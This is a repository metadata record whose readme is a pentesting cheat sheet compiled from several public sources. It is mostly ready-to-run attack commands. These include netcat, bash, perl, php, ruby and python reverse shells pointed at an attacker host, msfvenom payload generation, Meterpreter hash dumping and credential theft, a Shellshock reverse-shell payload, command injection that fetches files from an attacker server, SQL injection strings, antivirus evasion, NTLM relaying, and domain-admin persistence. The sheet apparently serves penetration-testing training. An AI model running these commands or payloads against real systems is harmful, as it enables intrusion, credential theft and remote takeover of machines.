{"id":22268843,"url":"https://github.com/anlominus/koth","last_synced_at":"2025-10-10T07:33:39.764Z","repository":{"id":37375655,"uuid":"504934807","full_name":"AnLoMinus/KoTH","owner":"AnLoMinus","description":"KoTH ~ King of the Hill - [BETA]","archived":false,"fork":false,"pushed_at":"2022-12-01T20:23:38.000Z","size":148,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-10-10T07:33:09.585Z","etag":null,"topics":["koth"],"latest_commit_sha":null,"homepage":"https://Anlominus.github.io/KoTH","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/AnLoMinus.png","metadata":{"files":{"readme":"README-Cheatsheets.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-06-18T19:37:59.000Z","updated_at":"2023-12-23T09:09:36.000Z","dependencies_parsed_at":"2023-01-23T21:15:47.490Z","dependency_job_id":null,"html_url":"https://github.com/AnLoMinus/KoTH","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/AnLoMinus/KoTH","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AnLoMinus%2FKoTH","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AnLoMinus%2FKoTH/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AnLoMinus%2FKoTH/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AnLoMinus%2FKoTH/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/AnLoMinus","download_url":"https://codeload.github.com/AnLoMinus/KoTH/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AnLoMinus%2FKoTH/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279003190,"owners_count":26083533,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-10T02:00:06.843Z","response_time":62,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["koth"],"created_at":"2024-12-03T11:14:05.156Z","updated_at":"2025-10-10T07:33:39.748Z","avatar_url":"https://github.com/AnLoMinus.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# [Pentesting Cheatsheet](https://hausec.com/pentesting-cheatsheet/)\n\nIn addition to my own contributions, this compilation is possible by other compiled cheatsheets by [g0tmilk](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/), [highon.coffee](https://highon.coffee/blog/cheat-sheet/), and [pentestmonkey,](http://pentestmonkey.net/) as well as a few others listed at the bottom. It’s easiest to search via ctrl+F, as the Table of Contents isn’t kept up to date fully.\n\n# **Pentesting Cheat Sheet**\n\n## **Table of Contents**\n\n## [**Enumeration**](#_Toc475368976)\n- [**General Enumeration**](#)\n- [**FTP Enumeration (21)**](#)\n- [**SSH (22)**](#)\n- [**SMTP Enumeration (25)**](#)\n- **[Finger Enumeration (79)](#_Toc494187363*\n- [**Web Enumeration (80/443)**](#)\n- [**Pop3 (110)**](#)\n- [**RPCBind (111)**](#)\n- [**SMB\\\\RPC Enumeration (139/445)**](#)\n- [**SNMP Enumeration (161)**](#)\n- [**Oracle (1521)**](#)\n- [**Mysql Enumeration (3306)**](#)\n- [**DNS Zone Transfers**](#)\n- [**Mounting File Shares**](#)\n- [**Fingerprinting**](#)\n- [**Exploit Research**](#)\n- [**Compiling Exploits**](#)\n- [**Packet Inspection**](#)\n- [**Password Cracking**](#)\n- [**Bruteforcing**](#)\n\n## [**Shells \u0026 Reverse Shells**](#)\n- [**SUID C Shells**](#)\n- [**TTY Shell**](#)\n- [**Spawn Ruby Shell**](#)\n- [**Netcat**](#)\n- [**Telnet Reverse Shell**](#)\n- [**PHP**](#)\n- [**Bash**](#)\n- [**Perl**](#)\n\n## [**Meterpreter**](#)\n- [**Windows reverse meterpreter payload**](#)\n- [**Windows VNC Meterpreter payload**](#)\n- [**Linux Reverse Meterpreter payload**](#)\n- [**Meterpreter Cheat Sheet**](#)\n- [**Meterpreter Payloads**](#)\n- [**Binaries**](#)\n- [**Web Payloads**](#)\n- [**Scripting Payloads**](#)\n- [**Shellcode**](#)\n- [**Handlers**](#)\n\n## **[Powershell](#_Toc494272708)**\n\n## [**Privilege Escalation**](#)\n- [**Linux**](#)\n- [**Windows**](#)\n\n## [**Command Injection**](#)\n- [**File Traverse**](#)\n- [**Test HTTP options using curl**](#)\n- [**Upload file using CURL to website with PUT option available**](#)\n- [**Transfer file**](#)\n- [**Activate shell file**](#)\n\n## [**SQLInjections**](#)\n- [**Injections**](#)\n- [**SQLMap**](#)\n- [**Miscellaneous**](#)\n- [**Tunneling**](#)\n- [**AV Bypass**](#)\n- [**Web hosts**](#)\n- [**Php Meterpreter Shell**](#)\n- [**Reverse shell using interpreters**](#)\n- [**Shellshock**](#)\n\n## [**Resources \u0026 Links**](#)\n- [**Windows Privilege Escalation**](#)\n- [**SQL \u0026 Apache Log paths**](#)\n- [**Recon**](#)\n- [**Cheat Sheets (Includes scripts)**](#)\n- [**Meterpreter Stuff**](#)\n- [**Proxy Chaining**](#)\n- [**Huge collection of common commands and scripts as well as general pentest info**](#)\n- [**Scripts**](#)\n- [**Pentester Bookmarks, huge collection of blogs, forums, and resources**](#)\n- [**Pentest Checklist**](#)\n- [**OSCP Writeups, blogs, and notes**](#)\n\n---\n\n# **Enumeration**\n### **General Enumeration:**\n\n- nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1\n\n  - Verbose, syn, all ports, all scripts, no ping\n\n-       nmap -v -sS -A -T4 x.x.x.x\n  - Verbose, SYN Stealth, Version info, and scripts against services.\n- nmap –script smb-check-vulns.nse –script-args=unsafe=1 -p445 \\[host\\]\n\n  - Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover\n\n-       netdiscover -r 192.168.1.0/24\n\n### **FTP Enumeration (21):**\n\n-       nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1\n\n### **SSH (22):**\n\n-       ssh INSERTIPADDRESS 22\n\n### **SMTP Enumeration (25):**\n\n-       nmap –script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1\n-       nc -nvv INSERTIPADDRESS 25\n-       telnet INSERTIPADDRESS 25\n\n### **Finger Enumeration (79):**\n\nDownload script and run it with a wordlist: [http://pentestmonkey.net/tools/user-enumeration/finger-user-enum](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum)\n\n### **Web Enumeration (80/443):**\n\n- dirbuster (GUI)\n- dirb http://10.0.0.1/\n-       nikto –h 10.0.0.1\n\n### **Pop3 (110):**\n\n-       telnet INSERTIPADDRESS 110\n- USER \\[username\\]\n- PASS \\[password\\]\n\n  - To login\n\n- LIST\n\n  - To list messages\n\n- RETR \\[message number\\]\n\n  - Retrieve message\n\n- QUIT\n\n  - quits\n\n### **RPCBind (111):**\n\n-       rpcinfo –p x.x.x.x\n\n### **SMB\\\\RPC Enumeration (139/445):**\n\n-       enum4linux –a 10.0.0.1\n- `nbtscan x.x.x.x`\n  - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain\n-       py 192.168.XXX.XXX 500 50000 dict.txt\n-       python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX\n-       nmap IPADDR --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse\n-       smbclient -L //INSERTIPADDRESS/\n  - List open shares\n-       smbclient //INSERTIPADDRESS/ipc$ -U john\n\n### **SNMP Enumeration (161):**\n\n-       snmpwalk -c public -v1 10.0.0.0\n-       snmpcheck -t 192.168.1.X -c public\n-       onesixtyone -c names -i hosts\n-       nmap -sT -p 161 192.168.X.X -oG snmp_results.txt\n-       snmpenum -t 192.168.1.X\n\n### **Oracle (1521):**\n\n-       tnscmd10g version -h INSERTIPADDRESS\n-       tnscmd10g status -h INSERTIPADDRESS\n\n### **Mysql Enumeration (3306):**\n\n-       nmap -sV -Pn -vv  10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122\n\n### **DNS Zone Transfers:**\n\n-       nslookup -\u003e set type=any -\u003e ls -d blah.com\n-       dig axfr blah.com @ns1.blah.com\n\n  - This one works the best in my experience\n-       dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml\n\n### **Mounting File Share**\n\n- showmount -e IPADDR\n-       mount 192.168.1.1:/vol/share /mnt/nfs  -nolock\n  - mounts the share to /mnt/nfs without locking it\n-       mount -t cifs -o username=user,password=pass,\n  - Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)\n-       net use Z: \\\\win-server\\share password  /user:domain\\janedoe /savecred /p:no\n  - Mount a Windows share on Windows from the command line\n-       apt-get install smb4k –y\n  - Install smb4k on Kali, useful Linux GUI for browsing SMB shares\n\n### **Fingerprinting:  Basic versioning / finger printing via displayed banner**\n\n-       nc -v 192.168.1.1 25\n-       telnet 192.168.1.1 25\n\n### **Exploit Research**\n\n-       searchsploit windows 2003 | grep -i local\n  - Search exploit-db for exploit, in this example windows 2003 + local esc\n\n### **Compiling Exploits**\n\n-       gcc -o exploit exploit.c\n  - Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linux\n-       i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe\n  - Compile windows .exe on Linux\n\n### **Packet Inspection:**\n\n-       tcpdump tcp port 80 -w output.pcap -i eth0\n  - tcpdump for port 80 on interface eth0, outputs to output.pcap\n\n# **Password Cracking**\n\n- hash-identifier \\[hash\\]\n- john hashes.txt\n-       hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlists/rockyou.txt\n- hashcat -m 1000 dump.txt -o output.txt --remove -a 3 ?u?l?l?d?d?d?d\n\n  - Brute force crack for NTLM hashes with an uppercase, lowercase, lowercase, and 4 digit mask\n\n- List of hash types and examples for hashcat [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes)\n- [https://hashkiller.co.uk](https://hashkiller.co.uk) has a good repo of already cracked MD5 and NTLM hashes\n\n### **Bruteforcing:**\n\n-       hydra 10.0.0.1 http-post-form “/admin.php:target=auth\u0026mode=login\u0026user=^USER^\u0026password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin\n-       hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt IPADDR PROTOCOL\n-       hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp –V\n  - Hydra SMTP Brute force\n\n## **Shells \u0026 Reverse Shells**\n\n### **SUID C Shells**\n\n- bin/bash:\n\nint main(void){\n\nsetresuid(0, 0, 0);\n\nsystem(\"/bin/bash\");\n\n}\n\n- bin/sh:\n\nint main(void){\n\nsetresuid(0, 0, 0);\n\nsystem(\"/bin/sh\");\n\n}\n\n### **TTY Shell:**\n\n-       python -c 'import pty;pty.spawn(\"/bin/bash\")'\n-       echo os.system('/bin/bash')\n-       /bin/sh –i\n-       execute('/bin/sh')\n  - LUA\n-       !sh\n  - Privilege Escalation via nmap\n-       :!bash\n  - Privilege escalation via vi\n\n### Fully Interactive TTY\n\n                                    In reverse shell python -c 'import pty; pty.spawn(\"/bin/bash\")'Ctrl-Z                                In Attacker consolestty -astty raw -echofg                                In reverse shellresetexport SHELL=bashexport TERM=xterm-256colorstty rows \u003cnum\u003e columns \u003ccols\u003e\n\n### **Spawn Ruby Shell**\n\n-       exec \"/bin/sh\"\n-       ruby -rsocket -e'f=TCPSocket.open(\"ATTACKING-IP\",80).to_i;exec sprintf(\"/bin/sh -i \u003c\u0026%d \u003e\u0026%d\n\n### **Netcat**\n\n-       nc -e /bin/sh ATTACKING-IP 80\n-       /bin/sh | nc ATTACKING-IP 80\n-       rm -f /tmp/p; mknod /tmp/p p \u0026\u0026 nc ATTACKING-IP 4444 0/tmp/p\n\n### **Telnet Reverse Shell**\n\n-       rm -f /tmp/p; mknod /tmp/p p \u0026\u0026 telnet ATTACKING-IP 80 0/tmp/p\n-       telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443\n\n### **PHP**\n\n-       php -r '$sock=fsockopen(\"ATTACKING-IP\",80);exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\n  - (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)\n\n### **Bash**\n\n-       exec /bin/bash 0\u00260 2\u003e\u00260\n-       0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/ATTACKING-IP/80; sh \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196\n-       exec 5\u003c\u003e/dev/tcp/ATTACKING-IP/80 cat \u003c\u00265 | while read line; do $line 2\u003e\u00265 \u003e\u00265; done\n\n\\# or: while read line 0\u003c\u00265; do $line 2\u003e\u00265 \u003e\u00265; done\n\n-       bash -i \u003e\u0026 /dev/tcp/ATTACKING-IP/80 0\u003e\u00261\n\n### **Perl**\n\n-       exec \"/bin/sh\";\n-       perl —e 'exec \"/bin/sh\";'\n-       perl -e 'use Socket;$i=\"ATTACKING-IP\";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n-       perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"ATTACKING-IP:80\");STDIN-\u003efdopen($c,r);$~-\u003efdopen($c,w);system$_ while\u003c\u003e;'\n  - Windows\n-       perl -e 'use Socket;$i=\"ATTACKING-IP\";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n  - Windows\n\n# **Meterpreter**\n\n### **Windows reverse meterpreter payload**\n\n-       set payload windows/meterpreter/reverse_tcp\n  - Windows reverse tcp payload\n\n### **Windows VNC Meterpreter payload**\n\n-       set payload windows/vncinject/reverse_tcp\n  - Meterpreter Windows VNC Payload\n-       set ViewOnly false\n\n### **Linux Reverse Meterpreter payload**\n\n-       set payload linux/meterpreter/reverse_tcp\n  - Meterpreter Linux Reverse Payload\n\n### **Meterpreter Cheat Sheet**\n\n-       upload file c:\\\\windows\n  - Meterpreter upload file to Windows target\n-       download c:\\\\windows\\\\repair\\\\sam /tmp\n  - Meterpreter download file from Windows target\n-       download c:\\\\windows\\\\repair\\\\sam /tmp\n  - Meterpreter download file from Windows target\n-       execute -f c:\\\\windows\\temp\\exploit.exe\n  - Meterpreter run .exe on target – handy for executing uploaded exploits\n-       execute -f cmd -c\n  - Creates new channel with cmd shell\n-       ps\n  - Meterpreter show processes\n-       shell\n  - Meterpreter get shell on the target\n-       getsystem\n  - Meterpreter attempts priviledge escalation the target\n-       hashdump\n  - Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first)\n-       portfwd add –l 3389 –p 3389 –r target\n  - Meterpreter create port forward to target machine\n-       portfwd delete –l 3389 –p 3389 –r target\n  - Meterpreter delete port forward\n-       use exploit/windows/local/bypassuac\n  - Bypass UAC on Windows 7 + Set target + arch, x86/64\n-       use auxiliary/scanner/http/dir_scanner\n  - Metasploit HTTP directory scanner\n-       use auxiliary/scanner/http/jboss_vulnscan\n  - Metasploit JBOSS vulnerability scanner\n-       use auxiliary/scanner/mssql/mssql_login\n  - Metasploit MSSQL Credential Scanner\n-       use auxiliary/scanner/mysql/mysql_version\n  - Metasploit MSSQL Version Scanner\n-       use auxiliary/scanner/oracle/oracle_login\n  - Metasploit Oracle Login Module\n-       use exploit/multi/script/web_delivery\n  - Metasploit powershell payload delivery module\n-       post/windows/manage/powershell/exec_powershell\n  - Metasploit upload and run powershell script through a session\n-       use exploit/multi/http/jboss_maindeployer\n  - Metasploit JBOSS deploy\n-       use exploit/windows/mssql/mssql_payload\n  - Metasploit MSSQL payload\n-       run post/windows/gather/win_privs\n  - Metasploit show privileges of current user\n-       use post/windows/gather/credentials/gpp\n  - Metasploit grab GPP saved passwords\n-       load kiwi\n- creds_all\n\n  - Metasploit load Mimikatz/kiwi and get creds\n\n-       run post/windows/gather/local_admin_search_enum\n  - Idenitfy other machines that the supplied domain user has administrative access to\n-       set AUTORUNSCRIPT post/windows/manage/migrate\n\n### **Meterpreter Payloads**\n\n-       msfvenom –l\n  - List options\n\n### **Binaries**\n\n-       msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf \u003e shell.elf\n-       msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe \u003e shell.exe\n-       msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho \u003e shell.macho\n\n### **Web Payloads**\n\n-       msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw \u003e shell.php\n  - PHP\n- set payload php/meterpreter/reverse_tcp\n\n  - Listener\n\n-       cat shell.php | pbcopy \u0026\u0026 echo '\u003c?php ' | tr -d '\\n' \u003e shell.php \u0026\u0026 pbpaste \u003e\u003e shell.php\n  - PHP\n-       msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp \u003e shell.asp\n  - ASP\n-       msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw \u003e shell.jsp\n  - JSP\n-       msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war \u003e shell.war\n  - WAR\n\n### **Scripting Payloads**\n\n- `msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw \u003e shell.py`\n  - Python\n-       msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw \u003e shell.sh\n  - Bash\n-       msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw \u003e shell.pl\n  - Perl\n\n### **Shellcode**\n\nFor all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.\n\n-       msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f\n-       msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f\n-       msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f\n\n### **Handlers**\n\nMetasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.\n\n    exploit/multi/handler\n\nAn example is:\n\n    msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f \u003e exploit.extension\n\n# **Powershell**\n\n**Execution Bypass**\n\n- Set-ExecutionPolicy Unrestricted \n  ./file.ps1\n- Import-Module script.psm1\n  Invoke-FunctionThatIsIntheModule\n- iex(new-object system.net.webclient).downloadstring(“file:///C:\\\\examplefile.ps1”)\n\n**Powershell.exe blocked**\n\n- Use ‘not powershell’ [https://github.com/Ben0xA/nps](https://github.com/Ben0xA/nps)\n\n**Persistence**\n\n- net user username \"password\" /ADD\n\n- net group \"Domain Admins\" %username% /DOMAIN /ADD\n\n**Gather NTDS.dit file**\n\n- `ntdsutil`\n\n  `activate instance ntds`\n\n  `ifm`\n\n  `create full C:\\ntdsutil`\n\n  `quit`\n\n  `quit`\n\n# **Privilege Escalation**\n\n## **Linux:**\n\nFind Binaries that will execute as the owner\n\n- find / -perm -u\\=s -type f 2\u003e/dev/null\n\nFind binaries that will execute as the group\n\n- find / -perm -g=s -type f 2\u003e/dev/null\n\nFind sticky-bit binaries\n\n- find / -perm -1000 -type d 2\u003e/dev/null\n\nIf Python is executable as root\n\n- python2.7 -c \"import pty;pty.spawn('/bin/sh');\"\n\n[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\n\n[https://github.com/pentestmonkey/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)\n\n## **Windows:**\n\n[https://github.com/pentestmonkey/windows-privesc-check](https://github.com/pentestmonkey/windows-privesc-check)\n\n[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)\n\n[https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/)\n\n# **Command Injection**\n\n### **File Traverse:**\n\n- website.com/file.php\\[?path=/\\]\n\n### **Test HTTP options using curl:**\n\n- curl -vX OPTIONS \\[website\\]\n\n### **Upload file using CURL to website with PUT option available**\n\n- curl --upload-file shell.php --url http://192.168.218.139/test/shell.php --http1.0\n\n### **Transfer file** (Try temp directory if not writable)(wget -O tells it where to store):\n\n- ?path=/; wget http://IPADDRESS:8000/FILENAME.EXTENTION;\n\n### **Activate shell file:**\n\n- ; php -f filelocation.php;\n\n# **SQLInjections**\n\n### Common **Injections for Login Forms:**\n\n- `admin' --`\n- `admin' #`\n- `admin'/*`\n- `' or 1=1--`\n- `' or 1=1#`\n- `' or 1=1/*`\n- `') or '1'='1--`\n- `') or ('1'='1—`\n\n### **SQLMap**\n\n- `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`\n  - Automated sqlmap scan\n- `sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3`\n- `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read=\"/var/www/blah.php\"`\n  - Targeted sqlmap scan\n- `sqlmap -u \"http://meh.com/meh.php?id=1\" --dbms=mysql --tech=U --random-agent --dump` Scan url for union + error based injection with mysql backend and use a random user agent + database dump\n- `sqlmap -o -u \"http://meh.com/form/\" –forms`\n  - sqlmap check form for injection\n- `sqlmap -o -u \"http://meh/vuln-form\" --forms -D database-name -T users –dump`\n  - sqlmap dump and crack hashes for table users on database-name.\n- `sqlmap --flush session`\n  - Flushes the session\n- `sqlmap -p user --technique=B`\n  - Attempts to exploit the “user” field using boolean technique.\n- `sqlmap -r \u003ccaptured request\u003e`\n  - Capture a request via Burp Suite, save it to a file, and use this command to let sqlmap automate everything. Add –os-shell at the end to pop a shell if possible.\n\n# **Miscellaneous**\n\n#### NTLMRelayx.py using mitm6\n\nThis will take captured credentials via IPv6 spoofing using mitm6 and relay them to a target via ntlmrelayx.py. It requires ntlmrelayx.py and mitm6 to be installed already.\n\n- mitm6 -d \u003cdomain.local\u003e\n\n  - First, start mitm6 and specify the domain you’re spoofing on with ‘-d domain.name’\n\n- ntlmrelayx.py -6 -wh 192.168.1.1 -t smb://192.168.1.2 -l ~/tmp/\n\n  - \\-6 specifies ipv6, -wh specifies where the WPAD file is hosted at (your IP usually). -t specifies the target, or destination where the credentials will be relayed. -l is to where to store the loot.\n\n#### Name your terminal whatever you want\n\nThis small script will name your terminal whatever you pass as an argument to it. It helps organizing with multiple terminals open. Thanks Ben!\n\n#!bin/bash\n\necho -ne \"\\\\033\\]0;${1}\\\\007\"\n\n**Tunneling:**\n\nsshuttle is an awesome tunneling tool that does all the hard work for you. It gets rid of the need for proxy chains. What this command does is tunnels traffic through 10.0.0.1 and makes a route for all traffic destined for 10.10.10.0/24 through your sshuttle tunnel.\n\n- `sshuttle -r root@10.0.0.1 10.10.10.0/24`\n\n**AV Bypass:**\n\n- wine hyperion.exe ../backdoor.exe ../backdoor_mutation.exe\n\n  - wine and hyperion need to be installed.\n\n**Web hosts**\n\n- `python -m SimpleHTTPServer 80`\n  - Basic HTTP Server. Will list the directory it’s started in.\n- `service apache2 start`\n  - Starts Apache web server. Place files in /var/www/html to be able to ‘wget’ them.\n\n### **Php Meterpreter Shell (Remove Guard bit)**\n\n- `msfvenom -p php/meterpreter/reverse_tcp LHOST=????????? LPORT=6000 R \u003e phpmeterpreter.php`\n\n### **Netcat**\n\n- Listener: `nc -lvp \u003cPORT\u003e`\n  - Listen verbosely on a port.\n- Target:`nc -e /bin/bash listeneripaddress listenerport`\n- or `ncat -v -l -p 7777 -e /bin/bash`\n- Host: `cat happy.txt | ncat -v -l -p 5555` Target: `ncat localhost 5555 \u003e happy_copy.txt`\n  - Download file via ncat\n\n### **Reverse shell using interpreters ([http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet))**\n\n- `python -c python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'`\n- `python -c \"exec(\\\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\\\")\"`\n\n### **Shellshock**\n\n- `curl -x TARGETADDRESS -H \"User-Agent: () { ignored;};/bin/bash -i \u003e\u0026 /dev/tcp/HOSTIP/1234 0\u003e\u00261\" TARGETADDRESS/cgi-bin/status`\n- `curl -x 192.168.28.167:PORT -H \"User-Agent: () { ignored;};/bin/bash -i \u003e\u0026 /dev/tcp/192.168.28.169/1234 0\u003e\u00261\" 192.168.28.167/cgi-bin/status`\n- `ssh username@IPADDRESS '() { :;}; /bin/bash'`\n  - Shellshock over SSH\n\n# CrackMapExec\n\n-       crackmapexec\n  - Spray the network with local login credentials then dump SAM contents\n-       crackmapexec\n  - Pass the hash network-wide, local login, dump LSA contents\n-       crackmapexec smb 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test\n  - Requires Empire Restful API to be running. It will spray supply credentials and pop an empire agent on any successful login. Read more [here](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Getting-Shells-101)\n\n# **Resources \u0026 Links**\n\n## **Windows Privilege Escalation**\n\n[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)\n\n[https://toshellandback.com/2015/11/24/ms-priv-esc/](https://toshellandback.com/2015/11/24/ms-priv-esc/)\n\n## **SQL \u0026 Apache Log paths**\n\n[http://www.itninja.com/blog/view/mysql-and-apache-profile-log-path-locations](http://www.itninja.com/blog/view/mysql-and-apache-profile-log-path-locations)\n\n## **Recon**\n\n[https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/](https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/)\n\n## **Cheat Sheets (Includes scripts):**\n\n[http://pentestmonkey.net/](http://pentestmonkey.net/)\n\n[https://highon.coffee/blog/cheat-sheet/](https://highon.coffee/blog/cheat-sheet/)\n\n[https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)\n\n## **Meterpreter Stuff**\n\n[http://netsec.ws/?p=331](http://netsec.ws/?p=331)\n\n## **Proxy Chaining**\n\napt-get install sshuttle\n\n[https://github.com/sshuttle/sshuttle](https://github.com/sshuttle/sshuttle)\n\n[https://github.com/rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng)\n\n[https://www.offensive-security.com/metasploit-unleashed/proxytunnels/](https://www.offensive-security.com/metasploit-unleashed/proxytunnels/)\n\n## **Huge collection of common commands and scripts as well as general pentest info**\n\n[https://bobloblaw.gitbooks.io/security/content/](https://bobloblaw.gitbooks.io/security/content/)\n\n## **Scripts**\n\n[https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)\n\n[https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\n\n[https://github.com/azmatt/windowsEnum](https://github.com/azmatt/windowsEnum)\n\n[https://github.com/leebaird/discover](https://github.com/leebaird/discover)\n\n[https://nmap.org/nsedoc/](https://nmap.org/nsedoc/)\n\n## **Pentester Bookmarks, huge collection of blogs, forums, and 